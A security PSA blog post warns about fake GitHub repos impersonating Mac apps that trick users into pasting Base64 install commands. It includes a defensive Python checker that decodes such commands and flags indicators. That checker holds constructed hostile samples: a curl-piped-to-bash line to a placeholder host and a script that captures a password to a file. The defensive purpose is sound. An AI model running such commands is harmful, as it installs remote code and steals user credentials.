Fake Mac Apps on GitHub
To be very clear, this is not another post of “Breaking news: malware exists on the internet” (or it may be, depending on how you want to look at it), but I feel it’s important that I leave a small PSA, as I have recently seen an influx of seemingly convincing GitHub repo replicas for decently popular Mac apps. They are so similar that they almost fooled me. Thankfully I quickly spotted some anomalies and narrowly avoided getting infected. Unfortunately these are the sort of red flags I don’t expect an average Joe to know about, which is why I’m explaining what the malware is and how to spot it.
[…]
By far the easiest way to avoid this is to simply look for the app online and track down the original developer. This lets you kill two birds with one stone by A: finding the original source of the app and avoiding impostors, and B: seeing whether the app or the developer has any previous reputation to begin with.
[…]
The second discrepancy is that the size of the fake app is ridiculously small. For instance, the original app is 13 MB in size while the fake one is less than 2 MB. Now, this is not necessarily a red flag (for example, some viruses do the opposite and fill their DMG with a lot of useless data to make the file larger than what VirusTotal can handle), but it’s still important to raise an eyebrow at installers with suspiciously small sizes.
I recently had this problem with EagleFiler. Someone had made a decently convincing GitHub repo using the official icon, screenshots, and similar marketing text. It ranked highly in Google searches, I guess because GitHub itself has lots of PageRank. The page tried to get users to paste a Base64-encoded snippet into Terminal, which would download and run a shell script that would prompt the user for a password and save it to a cleartext file.
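The practical defense against this kind of paste-into-Terminal install command is to decode it and read it before running anything. The script below is an added example, not code from this post or from the fake repo: it pulls any Base64 blob out of a pasted snippet, decodes it, and flags the patterns described above (Base64-wrapped commands, curl piped straight into a shell, a password prompt, a credential written to a file). The snippet and second-stage script it inspects are constructed stand-ins with a hypothetical `example.invalid` host, not the actual payload from the repo, and the function and indicator names are my own.

```python
"""Decode-before-you-run: inspect a pasted install one-liner offline.

Added example, not code from the post. The snippet and second-stage script
below are constructed stand-ins for the kind of payload described above,
not the contents of the actual repository.
"""
from __future__ import annotations

import base64
import binascii
import re

# A run of base64 alphabet long enough to be a payload rather than a flag or a word.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# (indicator name, pattern). Applied to the raw snippet, to anything it
# base64-decodes to, and to any script you downloaded for reading
# (fetch it with `curl -o file`, never pipe it into sh).
INDICATORS = [
    ("base64-obfuscation", re.compile(r"base64\s+(-[dD]|--decode)\b")),
    ("remote-code-pipe",   re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("password-prompt",    re.compile(r"read\s+-s\b|with administrator privileges|sudo\s+-S\b")),
    ("credential-to-file", re.compile(r'echo\s+"?\$\{?\w*(PASS|PWD|PASSWORD)\w*\}?"?\s*>>?\s*\S+')),
    ("quarantine-bypass",  re.compile(r"xattr\b[^\n]*com\.apple\.quarantine")),
]


def decode_base64_blobs(text: str) -> list[str]:
    """Return the printable text of every base64 blob embedded in `text`."""
    found = []
    for token in B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text: skip it
        if decoded and all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            found.append(decoded)
    return found


def indicators(text: str) -> list[str]:
    """Names of every INDICATORS pattern that matches `text`."""
    return [name for name, pattern in INDICATORS if pattern.search(text)]


def inspect_snippet(snippet: str, fetched_scripts: list[str] | tuple = ()) -> dict:
    """Decode the snippet and collect indicators across snippet, decoded text
    and any downloaded scripts. Returns {"decoded": [...], "indicators": [...]}."""
    decoded = decode_base64_blobs(snippet)
    texts = [snippet, *decoded, *fetched_scripts]
    found = sorted({name for text in texts for name in indicators(text)})
    return {"decoded": decoded, "indicators": found}


# Constructed: what a fake repo's "install" command might look like (hypothetical host).
INNER_COMMAND = "curl -fsSL http://example.invalid/install.sh | bash"
SAMPLE_SNIPPET = (
    "echo " + base64.b64encode(INNER_COMMAND.encode()).decode() + " | base64 --decode | sh"
)

# Constructed stand-in for the downloaded script stage described in the post:
# it prompts for a password and writes it to a cleartext file.
SAMPLE_STAGE2 = """#!/bin/bash
read -s -p "Password: " PASS
echo "$PASS" > /tmp/.cache
"""

if __name__ == "__main__":
    report = inspect_snippet(SAMPLE_SNIPPET, [SAMPLE_STAGE2])
    for text in report["decoded"]:
        print("decoded:", text)
    print("indicators:", ", ".join(report["indicators"]) or "none")
```

The indicator list is deliberately a handful of patterns; the point is the workflow (decode, read, download the next stage to a file, read that too), not a complete malware signature set. Anything that only works when you paste it blind into Terminal deserves the same suspicion as the undersized DMG.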
GitHub has ways to report abuse, as well as DMCA and trademark violations, and they got rid of the repo promptly.
Previously: